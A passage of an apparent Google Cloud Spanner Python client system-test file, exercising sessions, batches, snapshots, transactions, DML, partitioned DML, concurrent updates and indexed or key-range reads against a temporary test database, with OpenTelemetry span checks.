EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
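# Session-level system tests covering batches, snapshots, transactions, DML,
# batch DML, partitioned DML, indexed reads, and SQL parameter binding.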
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
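    # Build one INSERT statement per ROW_DATA row, quoting the string columns
    # so the statements can be passed to execute_sql / execute_update.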
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
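    # ``batch_update`` returns a google.rpc ``Status``; translate any non-OK
    # code into the matching google.api_core exception so failures are raised.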
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_transaction_batch_update_w_parent_span(self):
try:
from opentelemetry import trace
except ImportError:
return
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
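    # Run the same unit of work from several threads against a single counter
    # row; run_in_transaction retries aborted attempts until every increment
    # is applied, which the final snapshot read verifies.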
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
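    # Reset ``self.TABLE`` and insert ``row_count`` generated rows in a single
    # read-write transaction, returning the commit timestamp for later reads.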
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
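    # Exercise every combination of closed/open start and end bounds on key
    # ranges; expected slices follow Python indexing adjusted for each bound.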
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
